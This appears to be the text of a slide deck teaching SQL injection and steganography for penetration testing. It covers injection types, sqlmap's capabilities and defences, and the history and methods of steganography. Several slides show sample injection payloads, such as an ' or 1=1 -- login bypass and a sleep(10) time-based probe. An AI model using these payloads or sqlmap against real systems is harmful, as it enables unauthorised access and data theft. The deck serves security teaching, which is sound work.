SQL Injection Stegnography in Pen Testing
191013607gouthamsric
50 views
83 slides
Jun 21, 2024
Slide 1 of 83
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
About This Presentation
SQL Injection Stegnography in Pen Testing
Slide Content
SQL injection is a code injection technique, used to attack data-driven applications , in which malicious SQL statements are inserted into an entry field for execution This is a method to attack web applications that have a data repository. The attacker would send a specially crafted SQL statement that is designed to cause some malicious action.
Determining database schema Extracting data Adding or modifying data Bypassing authentication
On August 17, 2009, the United States Justice Department charged an American citizen Albert Gonzalez and two Russians with the theft of 130 million credit card numbers using an SQL injection attack. In 2008 a sweep of attacks began exploiting the SQL injection vulnerabilities of Microsoft's IIS web server and SQL database server. Over 500,000 sites were exploited.
The ability to inject SQL commands into the database engine through an existing application SQL injection is the use of publicly available fields to gain entry to your database. This is done by entering SQL commands into your form fields instead of the expected data. Improperly coded forms will allow a hacker to use them as an entry point to your database
1. App sends form to user. Attacker submits form with SQL exploit data. Application builds string with exploit data. Application sends SQL query to DB. DB executes query , including exploit, sends data back to application. Application returns data to user. DB Server Web Server Attacker Fir e w a ll Us e r P a ss ‘ or 1=1-- F o r m
Unauthorized Access Attempt: password = ’ or 1=1 -- SQL statement becomes: select count(*) from users where username = ‘user’ and password = ‘’ or 1=1 -- Checks if password is empty OR 1=1, which is always true , permitting access.
Leakage of sensitive information. Reputation decline. Modification of sensitive information. Loss of control of db server. Data loss. Denial of service.
1. First order attacks The attacker can simply enter a malicious string and cause the modified code to be executed immediately 2. Second order attacks The attacker injects into a persistent storage (such as a table row) which is deemed as a trusted source.
3. Lateral Injection The attacker can manipulate the implicit function To_Char() by changing the values of the environment Variable.
Injection through user input Injection through cookies Injection through server variables First order injection
SQL Injection Types Error-based SQL Injection UNION-based SQL Injection Blind SQL Injection Boolean Based SQL Injection Time-based SQL injection
SQL Injection Types
Error-based SQL Injection One of the most common types of SQL Injection vulnerabilities, it is also quite easy to determine. It relies on feeding unexpected commands or invalid input , typically through a user interface, to cause the database server to reply with an error that may contain details about the target structure, version, operating system, and even to return full query results.
Error-based SQL Injection
Error-based SQL Injection Error-based SQL injection is an In-band injection technique that enables threat actors to exploit error output from the database to manipulate its data . It manipulates the database into generating an error that informs the actor of the database’s structure . In-band injection enables threat actors to utilize one communication channel to launch an attack and retrieve data. It requires using a vulnerability to force data extraction. Vulnerability allows code to output an SQL error from the server instead of the required data . This error enables the actor to understand the entire database structure.
Example : Adding SQL Syntax to User Input In error-based SQL injection, the attacker tries to insert a malicious query with the goal of receiving an error message that provides sensitive information about the database . The attacker might try any type of SQL command in an input field parameter—such as a single quote, double quote, or SQL operators like AND, OR, NOT.
Example: Adding SQL Syntax to User Input This example shows a URL that accepts a parameter from the user, in this case the required item : https:// example.com/index.php?item=123 The attacker can try adding a single quote at the end of the parameter value: https://example.com/index.php?name=123 ’ If the database returns an error like this, the attack succeeded: You have an error in your SQL syntax ; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘‘VALUE’’.
Error-based SQL Injection This error message provides the attacker with : Information about the database used— MySQL The exact syntax that caused the error—single quote Where the syntax error occurred in the query—after the parameter value For an experienced attacker, this is enough to see that the server is connected to the database insecurely and plan additional SQL injection attacks that can cause damage . The attacker can also easily automate this using a command like grep extract to try many SQL syntax options in an input parameter and see which ones return errors.
Error-Based SQL Injection Prevention
When an application is vulnerable to SQL injection and the results of the query are returned within the application's responses, the UNION keyword can be used to retrieve data from other tables within the database. This results in an SQL injection UNION attack. Union-based SQL Injection
Union example Union keyword helps to execute one or more additional “Select” queries and append the results to the original query. Eg. , select a, b from table1 union select c, d from table2 The query returns a single result with two columns containing values from the columns a and b in table1 and columns c, d oftable2 Conditions to be met for a union query to work: Individual queries must return the same number of columns Data types in each column must be compatible between the individual queries.
Time-based SQL Injection This type of blind SQL Injection relies on waiting for a specific period before a vulnerable application responds to an attacker’s queries tailored with a time delay value . The success of the attack is based on the time taken by the application to deliver the response .
Time-based SQL Injection 1' AND sleep(10);- - Because we forced a delayed response of 10 seconds, the reply comes when this period expires .
The SQLMAP penetration testing tool is used to test whether a website is safe from SQL injection. sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. SQL Map
sqlmap is an open source penetration testing tool A utomates the process of detecting and exploiting SQL injection flaws Powerful detection engine Has many features for the ultimate penetration tester Has broad range of switches lasting from database fingerprinting, over data fetching from the database, etc.. SQL Map
Full support for MySQL Oracle PostgreSQL Microsoft SQL Server Microsoft Access IBM DB2 SQLite Firebird Sybase SAP MaxDB database management systems . SQL Map Features Full support for six SQL injection techniques: boolean -based blind, time-based blind, error-based , UNION query, stacked queries and out-of-band .
Support to D irectly connect to the database without passing via a SQL injection; provides DBMS credentials, IP address, port and database name. Dump database tables entirely, a range of entries or specific columns as per user’s choice. Search for specific database names , specific tables across all databases or specific columns across all databases’ tables. D ownload and upload any file from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server. SQL Map Features
Support to: E xecute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server. Establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user’s choice. Database process user privilege escalation via Metasploit’s Meterpreter getsystem command. SQL Map Features
Installing SQL Map SQLMAP comes pre – installed with kali linux , which is the preferred choice of most penetration testers. However, you can install sqlmap on other debian based linux systems using the command sudo apt-get install sqlmap
Using SQLMAP to test a website for SQL Injection vulnerability: Step 1: List information about the existing databases Step 2: List information about Tables present in a particular Database Step 3: List information about the columns of a particular table Step 4: Dump the data from the columns
Websites require constant access to the database. Firewalls provide little or no defense against SQL injection attacks. Antivirus programs are equally ineffective at blocking SQL injection attacks. Reasons for SQL Injection vulnerability
How to Prevent SQL Injections (SQLi) – Generic Tips Step 1: Train and maintain awareness Step 2: Do not trust any user input Step 3: Use whitelists, not blacklists Step 4: Adopt the latest technologies Step 5: Employ verified mechanisms Step 6: Scan regularly
1. Comprehensive data sanitization Web sites must filter all user input For example, e-mail addresses should be filtered to allow only the characters allowed in an e-mail address. Its SQL injection defenses can catch most attempts to sneak SQL through web channels .
2. Use a web application firewall A popular example is the free, open source module ModSecurity . ModSecurity provides a sophisticated and ever-evolving set of rules to filter potentially dangerous web requests.
3. Limit database privileges by context Create multiple database user accounts with the minimum levels of privilege for their usage environment. For example, the code behind a login page should query the database using an account limited only to the relevent credentials table. This way, a breach through this channel cannot be leveraged to compromise the entire database.
4. Avoid constructing SQL queries with user input Even data sanitization routines can be flawed. Using SQL variable binding with prepared statements or stored procedures is much safer than constructing full queries.
BSQL Hacker SQLmap SQLninja Safe3 SQL Injector SQLSus Mole Havij
SQL injection is technique for exploiting applications that use relational databases as their back end. Applications compose SQL statements and send to database. SQL injection use the fact that many of these applications concatenate the fixed part of SQL statement with user-supplied data that forms WHERE predicates or additional sub-queries.
The technique is based on malformed user- supplied data Transform the innocent SQL calls to a malicious call Cause unauthorized access, deletion of data, or theft of information All databases can be a target of SQL injection and all are vulnerable to this technique. The vulnerability is in the application layer outside of the database, and the moment that the application has a connection into the database.
VIDEO REFERENCES https://www.youtube.com/watch?v=3Axp3VDnf0I https://www.youtube.com/watch?v=FHCTfA9cCXs&list=RDCMUCBwRiON-FWnUJiaJVZhnHPg&start_radio=1 https://www.youtube.com/watch?v=5ArJJXnsuYI
Damn Vulnerable Web App (DVWA) Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn defenseless. Its primary objective is to be a guide for Web Security experts to test their abilities and instruments in a lawful domain.
Attacks in DVWA 1. Brute Force 2. Command Execution 3. CSRF 4. File Inclusion 5. SQL Injection 6. SQL Injection (Blind) 7. Shell Uploading 8. XSS ( Reflected ) 9. XSS ( Stored)
DVWA Security Options for Attacks: Low Level : freedom to exploit all known vulnerabilities Medium Level : will have all entry level validations and filtration High Level : tight Security
Installation DVWA is a web application coded in PHP that uses a MySQL back-end database. DVWA needs a web server, PHP and MySQL installed in order to run. The easiest way to install DVWA is to download and install 'XAMPP'.
STEGAN-O-GRAPHY
What is Steganography? Steganography is the art and science of writing hidden messages in such a way that no one, apart from the sender and intended recipient, suspects the existence of the message, It is a form of security through obscurity . The word steganography is of Greek origin and means "concealed writing" from the Greek words steganos meaning "covered or protected", and graphein meaning "writing". “ Steganography means hiding one piece of data within another”.
Exa m ple Since everyone can read, encoding text in neutral sentences is doubtfully effective
Exa m ple Since everyone can read, encoding text in neutral sentences is doubtfully effective S ince E veryone C an R ead, E ncoding T ext I n N eutral S entences I s D oubtfully E ffective
Exa m ple Since everyone can read, encoding text in neutral sentences is doubtfully effective S ince E veryone C an R ead, E ncoding T ext I n N eutral S entences I s D oubtfully E ffective „ Secret inside’
“The goal of steganography is to hide messages in such a way that no one apart from the intended recipient even knows that a message has been sent.” This can be achieve d by concealing the existence of information within seemingly harmless carriers or cover It can be understand by the following figure.
History Of Steganography The first recorded uses of steganography can be traced back to 440 BC when Herodotus mentions two examples of steganography in his Histories . Demaratus sent a warning about a forthcoming attack to Greece by writing it directly on the wooden backing of a wax tablet before applying its beeswax surface. Wax tablets were in common use then as reusable writing surfaces, sometimes used for shorthand. Ancient Chinese wrote messages on fine silk, which was then crunched into a tiny ball and covered in wax. The messenger then swallowed the ball of wax. Special “inks” were important steganographic tools even during Second World War . During Second World War a technique was developed to shrink photographically a page of text into a dot less than one millimeter in diameter, and then hide this microdot in an apparently innocuous letter. (The first microdot has been spotted
Physical Techniques Physical Techniques Hidden messages within wax tablets Hidden messages on messenger's body Hidden messages on paper written in secret inks Messages written in Morse code on knitting yarn and then knitted into a piece of clothing worn by a courier Messages written on envelopes in the area covered by postage stamps .
Digital Techniques Digital Techniques Concealing messages within the lowest bits of noisy images or sound files. Chaffing and winnowing . Modifying the echo of a sound file (Echo Steganography) Including data in ignored sections of a file, such as after the logical end of the carrier file.
Combined Crypto- Steganography Invisible Merge Ste g a nog ra p h y E n cr y pti o n
Basic Steganography Model
Steganography Terms Carrier or Cover File - A Original message or a file in which hidden information will be stored inside of it . Stego-Medium - The medium in which the information is hidden. Embedded or Payload - The information which is to be hidden or concealed. Steganalysis - The process of detecting hidden information inside a file.
Steganography in “TEXT” Ste ganography i n “ I MAGE S ” Steganography in “AUDIO”
Text Steganography Methods Text Steganography in Markup Languages[HTML] Text Steganography in Specific characters in words Line shifting Method Word shifting Open spaces Semantic methods Character Encoding
Examples of Text Steganography
Image Steganography Using image files as hosts for steganographic messages takes advantage of the limited capabilities of the human visual system
Audio Steganography Embedding secret messages into digital sound is known as audio Steganography.
Audio Steganography To embed data secretly onto digital audio file there are few techniques introduced : LSB Coding Phase Coding Parity Coding Spread Spectrum
Steganalysis is the art and science of detecting a secret communication. Hiding a message will most likely leave detectable traces in the cover medium. The information hiding process changes the statistical properties of the cover, which is a steganalyst attempts to detect. The process of attempting to detect statistical traces is called statistical steganalysis.
IMPORTANT ASPECTS OF STEGANALYSIS DETECTING HIDDEN INFORMATION DISABLING STEGANOGRAPHY
Tags
Categories
BusinessDownload
Download Slideshow Get the original presentation fileQuick Actions
Statistics
- Views 50
- Slides 83
- Age 529 days
Related Slideshows
1
DTI BPI Pivot Small Business - BUSINESS START UP PLAN
MeljunCortes
30 views
1
CATHOLIC EDUCATIONAL Corporate Responsibilities
MeljunCortes
31 views
11
Karin Schaupp – Evocation; lançamento: 2000
alfeuRIO
30 views
10
Pillars of Biblical Oneness in the Book of Acts
JanParon
27 views
31
7-10. STP + Branding and Product & Services Strategies.pptx
itsyash298
29 views
44
Business Legislation PPT - UNIT 1 jimllpkggg
slogeshk98
32 views